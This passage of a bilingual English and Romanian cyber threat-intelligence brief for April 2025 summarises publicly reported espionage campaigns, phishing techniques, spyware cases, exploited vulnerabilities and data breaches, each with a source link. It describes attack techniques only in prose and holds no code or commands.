redirect link. Further analyses revealed that the threat actors used a Russian-language Telegram channel and used Telegram in general to filter victim IPs. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/hunt.io\/blog\/russian-actor-cloudflare-phishing-telegram-c2\">link<\/a> <\/p><p><strong>Lazarus ClickFake Interview campaign targets cryptocurrency platforms<\/strong><br> On March 31, Sekoia reported that North Korea-linked threat actor Lazarus continued its targeting of the cryptocurrency sector through fake job interview, lately through so-called ClickFake Interviews. ClickFake Interview leverages fake job interview websites to deploy a Go backdoor on Windows and macOS environments by using the ClickFix tactic. <code>north korea<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/blog.sekoia.io\/clickfake-interview-campaign-by-lazarus\/\">link<\/a> <\/p><p><strong>Cookie-Bite PoC shows how malicious Chrome extensions can bypass MFA and hijack cloud sessions<\/strong><br> On April 22, Varonis Threat Labs researchers unveiled the Cookie-Bite attack, a proof-of-concept using a stealthy Chrome extension to steal Azure Entra ID session cookies and bypass MFA protections. The malicious extension monitors Microsoft login events, exfiltrates session tokens, and enables attackers to inject them for full access to services like Microsoft 365 and Teams, highlighting the severe risks posed by malicious browser extensions in cloud-based identity environments. <code>technology<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.varonis.com\/blog\/cookie-bite\">link<\/a> <\/p><p><strong>Google OAuth and DKIM flaw enables nearly undetectable phishing attacks<\/strong><br> On April 15, hackers exploited a flaw in Google\u2019s DKIM system to send phishing emails that passed authentication checks and appeared to come from no-reply@google.com, leading victims to a fake Google support portal hosted on sites.google.com. By abusing OAuth notifications and DKIM\u2019s limited validation scope, attackers crafted highly convincing credential-stealing messages\u2014an approach also seen targeting PayPal users through similar infrastructure abuse. <code>technology<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/threadreaderapp.com\/thread\/1912439023982834120.html\">link<\/a> <\/p><h3 id=\"data-exposure-and-leaks-2\">Data exposure and leaks<\/h3><p><strong>SK Telecom confirms malware breach exposing sensitive USIM data<\/strong><br> On April 22, South Korea's largest mobile operator, SK Telecom announced that malware had infiltrated its systems, exposing sensitive USIM data such as IMSI, MSISDN, and authentication keys from a cyberattack discovered on April 19. Although there\u2019s no evidence of misuse, the company reported the breach to authorities and implemented stricter USIM swap controls to prevent SIM-related fraud and enhance account protection for its 34 million subscribers. <code>telecommunications<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.sktelecom.com\/211423\">link<\/a> <\/p><h3 id=\"information-operations-2\">Information operations<\/h3><p><strong>China using AI in information operations targeting Taiwan<\/strong><br> On April 9, The Japan Times published an article about China conducting information operations on social media, namely Facebook and TikTok, to create internal turmoil in Taiwan. In fact, Taiwan's National Security Bureau published a report about China using AI to further these objectives, both in the generation and dissemination of messages. Their goal is to create division in the population. <code>artificial intelligence<\/code> <code>china<\/code> <code>japan<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.japantimes.co.jp\/news\/2025\/04\/08\/asia-pacific\/politics\/taiwan-china-ai-disinformation\/\">link<\/a> <\/p><h3 id=\"disruption-and-destruction-2\">Disruption and destruction<\/h3><p><strong>China accuses US of cyberattacks during Asian Winter Games<\/strong><br> On April 15, Chinese authorities accused the US NSA of launching cyberattacks during the 2025 Asian Winter Games in Harbin. The attacks allegedly targeted infrastructure in Heilongjiang province and attempted to access athletes\u2019 personal data. Three NSA agents were named, and US universities were implicated. China claims the activity aimed to disrupt critical systems and steal sensitive information. <code>china<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.cgtn.com\/news\/2025-04-15\/China-names-U-S-secret-agents-involved-in-Harbin-2025-cyberattacks-1CAgLi2gwKY\/p.html\">link<\/a> <\/p><div class=\"footnotes\"><hr><ol><li id=\"fn-1\"><p>Conclusions or attributions made in this document merely reflect what publicly available sources report. They do not reflect our stance.&#160;<a href=\"#fnref-1\" class=\"footnoteBackLink\" title=\"Jump back to footnote 1 in the text.\">&#8617;<\/a><\/p><\/li><\/ol><\/div><\/div>\n        <\/div>\n\n        <div id=\"content-ro\" class=\"lang-content\" style=\"display: none;\">\n            <div class=\"article-content\"><?xml encoding=\"UTF-8\"><h2 id=\"cyber-brief-april-2025\">Cyber &#8203;&#8203;Brief (aprilie 2025)<\/h2><p>2 mai 2025 - Versiunea: 1<\/p><p class=\"tlp-type clear\">TLP:CLEAR<\/p><h2 id=\"executive-summary\">Rezumat<\/h2><ul><li><p>Am analizat 311 rapoarte open source pentru acest Cyber &#8203;&#8203;Brief<sup class=\"footnote-ref\" id=\"fnref-1\"><a href=\"#fn-1\">1<\/a><\/sup>.<\/p><\/li><li><p><strong>Politic&#259;, cooperare &#537;i aplicarea legii.<\/strong>FBI a c&#259;utat ajutor pentru a identifica hackerii chinezi care &icirc;ncalc&#259; telecomunica&#539;iile. SUA au lansat un program pentru a proteja datele sensibile de amenin&#539;&#259;rile str&#259;ine. Trump l-a revocat pe directorul NSA, dup&#259; sfatul unui activist de extrem&#259; dreapt&#259;, potrivit Washington Post. China a admis &icirc;n mod tacit atacurile cibernetice asupra infrastructurii critice din SUA, &icirc;ncadrate ca un r&#259;spuns la sprijinul SUA pentru Taiwan. De asemenea, a restric&#539;ionat exporturile de p&#259;m&acirc;nturi rare &#537;i a interzis firmelor chineze s&#259; se angajeze cu contractori de ap&#259;rare din SUA.<\/p><\/li><li><p><strong>Ciberspionaj &#537;i prepozi&#539;ionare.<\/strong>Autorit&#259;&#539;ile franceze, germane &#537;i olandeze au legat recent atacurile cibernetice de actori sus&#539;inu&#539;i de stat rus, inclusiv spionajul cibernetic &icirc;mpotriva institu&#539;iilor diplomatice &#537;i de cercetare &#537;i &icirc;ncerc&#259;rile de sabotare asupra infrastructurii critice. Un membru al Parlamentului European a dezv&#259;luit c&#259; a fost vizat de hackeri lega&#539;i de Iran &icirc;n tentativa de spionaj cibernetic. Campania pentru lucr&#259;torii IT din RPDC legat&#259; de Coreea de Nord se extinde la nivel global, cu accent pe Europa. Tot &icirc;n Europa, au fost raportate noi cazuri de spyware mercenar, viz&acirc;nd jurnali&#351;ti &#351;i activi&#351;ti. La nivel global, cercet&#259;torii au observat c&#259; presupusul actor chinez de amenin&#539;are UNC5221 exploateaz&#259; &icirc;n mod activ vulnerabilitatea critic&#259; Ivanti Connect Secure, &icirc;n timp ce un grup chinez APT a vizat guvernul rus. &Icirc;n plus, China a acuzat serviciile de informa&#539;ii americane c&#259; vizeaz&#259; firma criptografic&#259; chinez&#259;. &Icirc;n special, APT36 legat de Pakistan a exploatat tema atacului Pahalgam pentru a viza guvernul indian.<\/p><\/li><li><p><strong>Crima cibernetic&#259;.<\/strong>Kitul de phishing Tycoon2FA utilizeaz&#259; acum tehnici avansate de evaziune, &icirc;n timp ce o campanie de phishing Cloudflare folose&#537;te Telegram pentru a filtra IP-urile victimelor. Lazarus continu&#259; s&#259; vizeze platformele de criptomonede cu interviuri de angajare false, iar dovada de concept Cookie-Bite arat&#259; cum extensiile Chrome pot ocoli MFA. &Icirc;ntre timp, un defect Google DKIM este exploatat pentru atacuri de phishing aproape nedetectabile.<\/p><\/li><li><p><strong>Expunerea &#537;i scurgerile de date.<\/strong>Cazuri notabile de scurgeri de date au afectat patru sectoare, respectiv administra&#539;ia public&#259;, telecomunica&#539;ii, tehnologie &#537;i transport.<\/p><\/li><li><p><strong>Perturbare &#537;i distrugere.<\/strong>Autorit&#259;&#539;ile chineze au acuzat NSA american&#259; c&#259; a lansat atacuri cibernetice &icirc;n timpul Jocurilor Asiatice de Iarn&#259; din 2025 de la Harbin, cu scopul de a perturba sistemele critice &#537;i de a fura informa&#539;ii sensibile.<\/p><\/li><li><p><strong>Opera&#539;iunea de informare.<\/strong>Contul de socializare al prim-ministrului ceh a fost compromis pentru a posta mesaje false, inclusiv despre un atac rusesc asupra solda&#539;ilor cehi. Lituania a avertizat cu privire la activitatea hibrid&#259; rus&#259; &#537;i belarus&#259; fa&#539;&#259; de diaspora belarus&#259;. Mass-media japonez&#259; a relatat despre utilizarea IA &icirc;n opera&#539;iunile de informare care vizeaz&#259; Taiwanul &icirc;n China.<\/p><\/li><li><p><strong>Hacktivism.<\/strong>&Icirc;n Europa, presupu&#537;ii hacktivi&#537;ti lega&#539;i de Rusia au vizat diverse entit&#259;&#539;i din Europa, inclusiv organiza&#539;ii legate de alegeri finlandeze &#537;i organiza&#539;ii olandeze, &icirc;n timp ce o coali&#539;ie de hacktivi&#537;ti supranumit&#259; &bdquo;Liga Sf&acirc;nt&#259;&rdquo; vizeaz&#259; armata britanic&#259; cu atacuri DDoS.<\/p><\/li><\/ul><h2 id=\"europe\">Europa<\/h2><h3 id=\"cyber-policy-and-law-enforcement\">Politica cibernetic&#259; &#537;i aplicarea legii<\/h3><p><strong>Guvernul ceh a sanc&#539;ionat ofi&#539;erul rus GRU<\/strong><br>Pe 2 aprilie, guvernul ceh a ad&#259;ugat jurnalista Natalia Sudliankov&aacute; &#537;i ofi&#539;erul GRU Alexei Shavrov pe lista de sanc&#539;iuni pentru leg&#259;turile cu informa&#539;iile militare ruse. Ambii sunt acuza&#539;i c&#259; sprijin&#259; campanii de influen&#539;&#259; a statului rus &#537;i opera&#539;iuni de informare &icirc;n Cehia. Sudliankov&aacute; a primit ordin s&#259; p&#259;r&#259;seasc&#259; &#539;ara &icirc;n 30 de zile.<code>rusia<\/code> <code>sanc&#539;iuni<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/ct24.ceskatelevize.cz\/clanek\/domaci\/vlada-rozsirila-sankcni-seznam-o-dvojici-spojenou-s-ruskou-gru-359667\">link<\/a> <\/p><p><strong>Operation Endgame dobor&icirc; clien&#539;ii Smokeloader<\/strong><br>La 9 aprilie, Europol a anun&#539;at c&#259; Opera&#539;iunea Endgame, o ini&#539;iativ&#259; de cooperare &icirc;ntre Europol, poli&#539;ia din mai multe &#539;&#259;ri UE, SUA &#537;i Eurojust, care a dus la eliminarea celor mai mari aplica&#539;ii malware &icirc;n mai 2024, a desf&#259;&#537;urat o nou&#259; opera&#539;iune de extindere &icirc;mpotriva re&#539;elei botnet cu plata pe instalare Smokeloader la &icirc;nceputul anului 2025. botnet.<code>eliminare<\/code> <code>arest&#259;ri<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.europol.europa.eu\/media-press\/newsroom\/news\/operation-endgame-follow-leads-to-five-detentions-and-interrogations-well-server-takedowns\">leg&#259;tur&#259;<\/a> <\/p><p><strong>&#536;ase infractori cibernetici aresta&#539;i &icirc;n Spania pentru &icirc;n&#537;el&#259;torie AI<\/strong><br>Pe 7 aprilie, Polic&iacute;a Nacional din Spania a anun&#539;at arestarea a &#537;ase persoane apar&#539;in&acirc;nd unei organiza&#539;ii criminale care a &icirc;n&#537;elat peste 19 milioane de euro victimelor din &icirc;ntreaga lume. Ei au creat reclame false cu personaje na&#539;ionale cunoscute prin inteligen&#539;a artificial&#259;, recomand&acirc;nd oamenilor s&#259; investeasc&#259; &icirc;n produse; victimele au fost alese prin algoritmi.<code>arest&#259;ri<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.policia.es\/_es\/comunicacion_prensa_detalle.php?ID=16521\">link<\/a> <\/p><h3 id=\"cyberespionage-and-prepositioning\">Ciberspionaj &#537;i prepozi&#539;ionare<\/h3><p><strong>Autorit&#259;&#539;ile franceze atribuie campania de spionaj cibernetic APT28 intereselor statului rus<\/strong><br>Pe 29 aprilie, agen&#539;ia francez&#259; de securitate cibernetic&#259; ANSSI a raportat c&#259; APT28, un grup de amenin&#539;are legat de Rusia, a vizat guvernul francez, sectoarele diplomatice &#537;i de cercetare &icirc;ntre 2021 &#537;i 2024. Aceste atacuri cibernetice au avut ca scop colectarea informa&#539;iilor &#537;i fac parte din opera&#539;iuni mai ample care afecteaz&#259; Europa, Ucraina &#537;i America de Nord. Atacurile continu&#259; pe fondul r&#259;zboiului Rusiei &icirc;mpotriva Ucrainei. ANSSI &#537;i partenerii s&#259;i au identificat mai multe lan&#539;uri de infec&#539;ie utilizate &icirc;n aceste campanii.<code>rusia<\/code> <code>diploma&#539;ie<\/code> <code>cercetare<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.cert.ssi.gouv.fr\/cti\/CERTFR-2025-CTI-006\/\">link<\/a> <\/p><p><strong>Informa&#539;iile germane analizeaz&#259; un posibil atac cibernetic legat de Rusia, care vizeaz&#259; organiza&#539;ia de cercetare<\/strong><br>Pe 8 aprilie, Oficiul Federal pentru Securitatea Informa&#539;iei (BSI) din Germania &#537;i Oficiul Federal pentru Protec&#539;ia Constitu&#539;iei (BfV) au anun&#539;at c&#259; investigheaz&#259; un atac cibernetic care vizeaz&#259; Asocia&#539;ia German&#259; pentru Studii Est-Europene (DGO), o organiza&#539;ie specializat&#259; &icirc;n rela&#539;ii interna&#539;ionale. Actorii de amenin&#539;&#259;ri au &icirc;nc&#259;lcat DGO la sf&acirc;r&#537;itul lunii martie &#537;i &#537;i-au accesat e-mailurile. Oficialii serviciilor secrete germane spun c&#259; b&#259;nuiesc c&#259; actorii amenin&#539;&#259;rilor sunt lega&#539;i de Rusia, posibil APT29.<code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.dw.com\/en\/germany-suspects-russian-cyber-attack-on-research-group\/a-72175406\">link<\/a> <\/p><p><strong>Hackerii ru&#537;i vizeaz&#259; infrastructura critic&#259; olandez&#259; &icirc;n prima &icirc;ncercare cunoscut&#259; de sabotaj<\/strong><br>Pe 22 aprilie, Agen&#539;ia Olandez&#259; de Informa&#539;ii Militare (MIVD) a dezv&#259;luit c&#259; hackerii ru&#537;i au &icirc;ncercat s&#259; saboteze sistemul de control digital al unei instala&#539;ii publice olandeze anul trecut, marc&acirc;nd primul atac cibernetic cunoscut asupra infrastructurii critice din &#538;&#259;rile de Jos. Agen&#539;ia a avertizat cu privire la amenin&#539;&#259;rile tot mai mari din partea Rusiei &#537;i Chinei, subliniind eforturile de sabotare ale Rusiei &icirc;n Marea Nordului &#537;i cre&#537;terea opera&#539;iunilor cibernetice &icirc;mpotriva na&#539;iunilor europene care sprijin&#259; Ucraina.<code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.dw.com\/en\/dutch-intelligence-reports-russian-cyber-attack\/a-72309443\">link<\/a> <\/p><p><strong>Actorii amenin&#539;&#259;rilor lega&#539;i de Rusia vizeaz&#259; fluxurile de lucru Microsoft OAuth<\/strong><br>Pe 22 aprilie, Volexity a publicat o postare pe blog despre campaniile de phishing legate de Rusia care abuzau de fluxurile de lucru de autentificare Microsoft OAuth 2.0 pentru a viza entit&#259;&#539;ile cu leg&#259;turi cu Ucraina. Actorii amenin&#539;&#259;rilor, urm&#259;ri&#539;i ca UTA0352 &#537;i UTA0355, se uzurpeaz&#259; pe oficialii europeni &#537;i folosesc platforme precum Signal &#537;i WhatsApp pentru a atrage victimele s&#259; partajeze codurile de autorizare Microsoft.<code>administra&#539;ia public&#259;<\/code> <code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.volexity.com\/blog\/2025\/04\/22\/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows\/\">link<\/a> <\/p><p><strong>Gamaredon, legat de Rusia, a vizat o misiune militar&#259; str&#259;in&#259; &icirc;n Ucraina cu unit&#259;&#539;i deta&#537;abile care furnizeaz&#259; GammaSteel<\/strong><br>Actorul de amenin&#539;&#259;ri legat de Rusia, Gamaredon, a vizat o misiune militar&#259; str&#259;in&#259; a unei &#539;&#259;ri occidentale cu sediul &icirc;n Ucraina cu malware GammaSteel. Accesul ini&#539;ial a fost ob&#539;inut prin intermediul unit&#259;&#539;ilor amovibile infectate. Lan&#539;ul de infec&#539;ie implic&#259; scripturi PowerShell pentru ofuscare &#537;i servicii precum write.as &#537;i cURL cu Tor pentru exfiltrarea datelor.<code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.security.com\/threat-intelligence\/shuckworm-ukraine-gammasteel\">link<\/a> <\/p><p><strong>Europarlamentarul Hannah Neumann, vizat&#259; de hackeri lega&#539;i de Iran &icirc;ntr-o tentativ&#259; de spionaj cibernetic<\/strong><br>Pe 23 aprilie, europarlamentarul Hannah Neumann a dezv&#259;luit c&#259; biroul s&#259;u a fost vizat de o opera&#539;iune de spionaj cibernetic legat de Teheran. Hackerii au uzurpat identitatea unor persoane de contact de &icirc;ncredere pentru a furniza malware pe laptopul ei. Atacul, atribuit grupului iranian APT42, a fost blocat &icirc;nainte ca orice date s&#259; fie furate. Neumann, pre&#537;edintele delega&#539;iei UE-Iran, consider&#259; c&#259; &icirc;ncercarea a avut ca scop intimidarea ei din cauza pozi&#539;iei sale critice fa&#539;&#259; de regimul iranian.<code>iran<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.politico.eu\/article\/european-parliament-iran-delegation-chair-victim-tehran-linked-hacking-hannah-neumann\/\">link<\/a> <\/p><p><strong>Furnizorii chinezi de interconectare mobil&#259; prezint&#259; riscuri de supraveghere<\/strong><br>Pe 17 aprilie, iVerify, o companie de securitate cibernetic&#259;, a subliniat c&#259; furnizorii de interconectare mobil&#259; de&#539;inut&#259; de stat din China sunt parte integrant&#259; a traficului mobil global, direc&#539;ion&acirc;nd date pentru peste 60 de operatori din 35 de &#539;&#259;ri, inclusiv &icirc;n Europa. iVerify a subliniat riscul atacurilor de tip man-in-the-middle din partea unor astfel de furnizori chinezi de interconectare mobil&#259;, care ar putea intercepta traficul ori de c&acirc;te ori traficul este direc&#539;ionat folosind protocoale &icirc;nvechite, necriptate precum SS7 &#537;i Diameter.<code>China<\/code> <code>telecomunica&#539;ii<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/iverify.io\/blog\/abusing-data-in-the-middle-surveillance-risks-in-china-s-state-owned-mobile-ecosystem\">link<\/a> <\/p><p><strong>Campania pentru lucr&#259;torii IT din RPDC legat&#259; de Coreea de Nord se extinde la nivel global, cu accent pe Europa<\/strong><br>La 1 aprilie, Google Cloud a raportat c&#259; campania pentru lucr&#259;torii IT din RPDC, legat&#259; de Coreea de Nord, sa extins. &Icirc;n timp ce Statele Unite r&#259;m&acirc;n o &#539;int&#259; cheie, &icirc;n ultimele luni, lucr&#259;torii IT din RPDC au &icirc;nt&acirc;mpinat provoc&#259;ri &icirc;n c&#259;utarea &#537;i men&#539;inerea unui loc de munc&#259; &icirc;n &#539;ar&#259;. Google evalueaz&#259; c&#259; campania sa extins la nivel global, cu un accent notabil pe Europa. Lucr&#259;torul IT a c&#259;utat &icirc;n mod activ un loc de munc&#259; &icirc;n mai multe organiza&#539;ii din Europa, &icirc;n special &icirc;n cele din baza industrial&#259; de ap&#259;rare &#537;i &icirc;n sectoarele guvernamentale.<code>coreea de nord<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/dprk-it-workers-expanding-scope-scale\">link<\/a> <\/p><p><strong>Doi jurnali&#351;ti s&acirc;rbi au fost viza&#355;i de programul spion Pegasus &icirc;n februarie 2025<\/strong><br>Pe 28 martie, Amnesty International a raportat c&#259; doi jurnali&#351;ti de la Balkan Investigative Reporting Network (BIRN), o re&#355;ea premiat&#259; de jurnali&#351;ti de investiga&#355;ie din Serbia, au fost viza&#355;i de programul spion Pegasus al Grupului NSO. Potrivit investiga&#539;iei Amnesty International, intruziunea a avut loc &icirc;n februarie 2025. Este a treia oar&#259; &icirc;n doi ani c&acirc;nd Laboratorul de securitate al Amnesty International a constatat c&#259; programul spion Pegasus al Grupului NSO este folosit &icirc;mpotriva societ&#259;&#539;ii civile din Serbia.<code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.amnesty.org\/en\/latest\/news\/2025\/03\/serbia-birn-journalists-targeted-with-pegasus-spyware\/\">link<\/a> <\/p><p><strong>Utilizatorii WhatsApp din &#539;&#259;rile UE printre victimele campaniei de spyware NSO din 2019<\/strong><br>Pe 9 aprilie, postul de &#537;tiri online TechCrunch a publicat un articol despre documentele instan&#539;elor care dezv&#259;luie loca&#539;iile victimelor WhatsApp vizate de software-ul spion NSO &icirc;n 2019. La acea vreme, au fost viza&#539;i peste 100 de activi&#537;ti pentru drepturile omului, jurnali&#537;ti &#537;i membri ai societ&#259;&#539;ii civile, cu un total de aproximativ 1400 de victime. Acum se pare c&#259; printre victime au existat utilizatori &icirc;n Spania, &#538;&#259;rile de Jos, Ungaria, Fran&#539;a &#537;i Regatul Unit.<code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/techcrunch.com\/2025\/04\/09\/court-document-reveals-locations-of-whatsapp-victims-targeted-by-nso-spyware\/\">link<\/a> <\/p><p><strong>Apple avertizeaz&#259; utilizatorii, inclusiv un jurnalist &#537;i un activist din Europa, despre vizarea programelor spion<\/strong><br>Pe 29 aprilie, Apple a notificat utilizatorii din 100 de &#539;&#259;ri c&#259; ar fi putut fi viza&#539;i de programe spion guvernamentale, inclusiv jurnalistul italian Ciro Pellegrino &#537;i activista olandez&#259; Eva Vlaardingerbroek. Alertele urmeaz&#259; avertismente similare din partea Apple &#537;i a altor firme tehnologice, pe fondul investiga&#539;iilor privind spyware-ul mercenar care se presupune c&#259; ar fi v&acirc;ndut guvernelor &#537;i folosit &icirc;mpotriva jurnali&#537;tilor, activi&#537;tilor &#537;i ONG-urilor.<code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.engadget.com\/cybersecurity\/apple-sends-spyware-warnings-to-iphone-users-in-100-countries-142547474.html\">link<\/a><\/p><p><strong>Suspiciune de &icirc;nc&#259;lcare a datelor &icirc;n serviciul de acces la distan&#539;&#259; al Ministerului finlandez de Externe<\/strong><br>Pe 27 martie, Ministerul finlandez pentru Afaceri Externe a detectat activitate suspect&#259; &icirc;n serviciul s&#259;u de acces la distan&#539;&#259;, st&acirc;rnind &icirc;ngrijor&#259;ri cu privire la o posibil&#259; &icirc;nc&#259;lcare a datelor. Ca r&#259;spuns, Ministerul a dezactivat rapid serviciul &#537;i a lansat o investiga&#539;ie intern&#259;. Incidentul a fost raportat Biroului Na&#539;ional de Investiga&#539;ii &#537;i autorit&#259;&#539;ilor de securitate cibernetic&#259; pentru analize suplimentare. Ministerul &#537;i-a subliniat angajamentul de a-&#537;i asigura sistemele &#537;i de a atenua orice riscuri poten&#539;iale.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/um.fi\/current-affairs\/-\/asset_publisher\/gc654PySnjTX\/content\/ulkoasiainhallinnon-etayhteyspalvelussa-tietomurtoepaily\">link<\/a> <\/p><p><strong>Partidul politic polonez vizat &icirc;naintea alegerilor preziden&#539;iale din Polonia<\/strong><br>Pe 2 aprilie, premierul polonez Donald Tusk a postat pe X c&#259; partidul s&#259;u politic a fost &#539;inta unui atac cibernetic &#537;i a sugerat c&#259; are origini estice. Donald Tusk a spus c&#259; sistemul informatic al partidului s&#259;u Civic Platform a fost vizat, &icirc;nainte de viitoarele alegeri preziden&#539;iale. &#536;eful biroului lui Tusk a declarat ulterior presei poloneze c&#259; atacul cibernetic a constat &icirc;ntr-o &icirc;ncercare de a prelua controlul computerelor angaja&#539;ilor biroului Platformei Civice &#537;i ale personalului electoral.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.euronews.com\/my-europe\/2025\/04\/02\/polands-pm-donald-tusk-says-his-partys-computer-systems-targeted-in-cyberattack\">link<\/a> <\/p><h3 id=\"cybercrime\">Crima cibernetic&#259;<\/h3><p><strong>Exploatarea NTLM CVE-2025-24054 abuzat&#259; activ prin fi&#537;iere r&#259;u inten&#539;ionate .library-ms<\/strong><br>Pe 16 aprilie, Check Point a raportat exploatarea activ&#259; a CVE-2025-24054, o vulnerabilitate de divulgare hash NTLM declan&#537;at&#259; de fi&#537;iere r&#259;u inten&#539;ionate .library-ms. &Icirc;n ciuda patch-ului Microsoft din 11 martie, atacatorii au &icirc;nceput s&#259; foloseasc&#259; defectul p&acirc;n&#259; pe 19 martie, &#539;int&acirc;nd entit&#259;&#539;i din Polonia &#537;i Rom&acirc;nia prin campanii de malspam. Exploatarea necesit&#259; o interac&#539;iune minim&#259; a utilizatorului, cum ar fi clic dreapta sau navigare la un folder &#537;i seam&#259;n&#259; cu vulnerabilitatea anterioar&#259; CVE-2024-43451.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/research.checkpoint.com\/2025\/cve-2025-24054-ntlm-exploit-in-the-wild\/\">link<\/a> <\/p><h3 id=\"disruption-and-destruction\">Perturbare &#537;i distrugere<\/h3><p><strong>Un atac cibernetic perturb&#259; furnizorul spaniol de ap&#259; Aig&uuml;es de Matar&oacute;<\/strong><br>Pe 23 aprilie, un atac cibernetic a lovit furnizorul spaniol de ap&#259; Aig&uuml;es de Matar&oacute;, afect&acirc;nd sistemele corporative &#537;i site-ul s&#259;u web, dar l&#259;s&acirc;nd intacte controalele de aprovizionare cu ap&#259; &#537;i de calitate. Aig&uuml;es de Matar&oacute; a declarat c&#259; atacul ar putea deranja abona&#539;ii s&#259;i care au devenit &icirc;n imposibilitatea de a accesa serviciile corporative &#537;i ar putea &icirc;nt&acirc;mpina &icirc;nt&acirc;rzieri pentru facturare &#537;i alte proceduri administrative. Natura atacului r&#259;m&acirc;ne neconfirmat&#259;.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/therecord.media\/cyberattack-water-supplier-barcelona-spain\">link<\/a> <\/p><h3 id=\"information-operations\">Opera&#539;iuni de informare<\/h3><p><strong>Contul de socializare a premierului ceh Petr Fiala compromis<\/strong><br>Pe 8 aprilie, hackerii au &icirc;nc&#259;lcat contul X al premierului ceh Petr Fiala (fostul Twitter), post&acirc;nd mesaje false, inclusiv despre un atac rusesc asupra solda&#539;ilor cehi. Activitatea r&#259;u inten&#539;ionat&#259; a urm&#259;rit s&#259; induc&#259; &icirc;n eroare adep&#539;ii &#537;i s&#259; prejudicieze reputa&#539;ia premierului.<code>rusia<\/code> <code>social media<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.reuters.com\/world\/europe\/czech-pm-fialas-x-account-attacked-with-fake-posts-2025-04-08\/\">link<\/a> <\/p><p><strong>Securitatea de stat a Lituaniei avertizeaz&#259; cu privire la activitatea hibrid&#259; rus&#259; &#537;i belarus&#259; fa&#539;&#259; de diaspora belarus&#259;<\/strong><br>Pe 23 aprilie, Departamentul de Securitate de Stat al Lituaniei a raportat public despre atacurile hibride planificate de serviciile de informa&#539;ii ruse &#537;i bieloruse &icirc;mpotriva diasporei belaruse care tr&#259;iesc &icirc;n Lituania. Atacurile au implicat componente ale opera&#539;iunii de informare, cum ar fi videoclipuri filmate de grupuri litviniste &#537;i &icirc;ndreptate &icirc;mpotriva Lituaniei, care au fost r&#259;sp&acirc;ndite pe re&#539;elele de socializare. Scopul atacurilor ar fi incitarea tensiunilor etnice &#537;i cre&#537;terea sentimentului de nesiguran&#539;&#259; &icirc;n Lituania.<code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.vsd.lt\/en\/2025\/04\/23\/priesiskos-zvalgybos-tarnybos-bando-organizuoti-smurtinius-ispuolius-pries-lietuvoje-gyvenancius-baltarusius\/\">link<\/a> <\/p><h3 id=\"data-exposure-and-leaks\">Expunerea datelor &#537;i scurgerile<\/h3><p><strong>Scurgere major&#259; de date &icirc;n curs de anchet&#259; la ministerele olandeze<\/strong><br>Pe 10 aprilie, a ie&#537;it la iveal&#259; o scurgere semnificativ&#259; de date care afecteaz&#259; mai multe ministere olandeze, inclusiv Afaceri Economice &#537;i Clim&#259; &#537;i Cre&#537;tere Verde. Autorit&#259;&#539;ile olandeze nu au confirmat dac&#259; au fost accesate sau furate date cu caracter personal. Ministerul de Interne conduce ancheta, iar Autoritatea Olandez&#259; pentru Protec&#539;ia Datelor a fost notificat&#259;, de&#537;i amploarea &#537;i impactul complet r&#259;m&acirc;n neclare.<code>administra&#539;ia public&#259;<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/nltimes.nl\/2025\/04\/10\/major-data-leak-discovered-multiple-dutch-ministries-impact-currently-unclear\">link<\/a> <\/p><p><strong>&Icirc;nc&#259;lcarea datelor Samsung Germania expune 270.000 de &icirc;nregistr&#259;ri de asisten&#539;&#259; pentru clien&#539;i<\/strong><br>Pe 14 aprilie, presa german&#259; a dezv&#259;luit c&#259; pe 30 martie, datele de la Samsung Germania au fost compromise &icirc;ntr-o &icirc;nc&#259;lcare a datelor a furnizorului lor de logistic&#259;, Spectos, expun&acirc;nd o baz&#259; de date de asisten&#539;&#259; care con&#539;ine date despre clien&#539;i. &Icirc;nc&#259;lcarea a dus la furtul a 270.000 de &icirc;nregistr&#259;ri de asisten&#539;&#259; pentru clien&#539;i, listate acum pe Have I Been Pwned, inclusiv e-mailuri, nume, achizi&#539;ii &#537;i numere de urm&#259;rire, care ar putea fi utilizate gre&#537;it pentru phishing, de&#537;i accesul la sistemele de baz&#259; a fost blocat &#537;i riscurile directe de furt de identitate r&#259;m&acirc;n sc&#259;zute.<code>tehnologie<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.heise.de\/en\/news\/Have-I-Been-Pwned-270-000-data-records-stolen-from-Samsung-integrated-10350941.html\">link<\/a> <\/p><p><strong>&Icirc;nc&#259;lcarea Europcar GitLab expune date de p&acirc;n&#259; la 200.000 de clien&#539;i<\/strong><br>&Icirc;n martie 2025, un hacker a ob&#539;inut acces la depozitele private GitLab ale Europcar Mobility Group, fur&acirc;nd 37 GB de date, inclusiv cod surs&#259;, copii de rezerv&#259; SQL &#537;i fi&#537;iere de configurare. 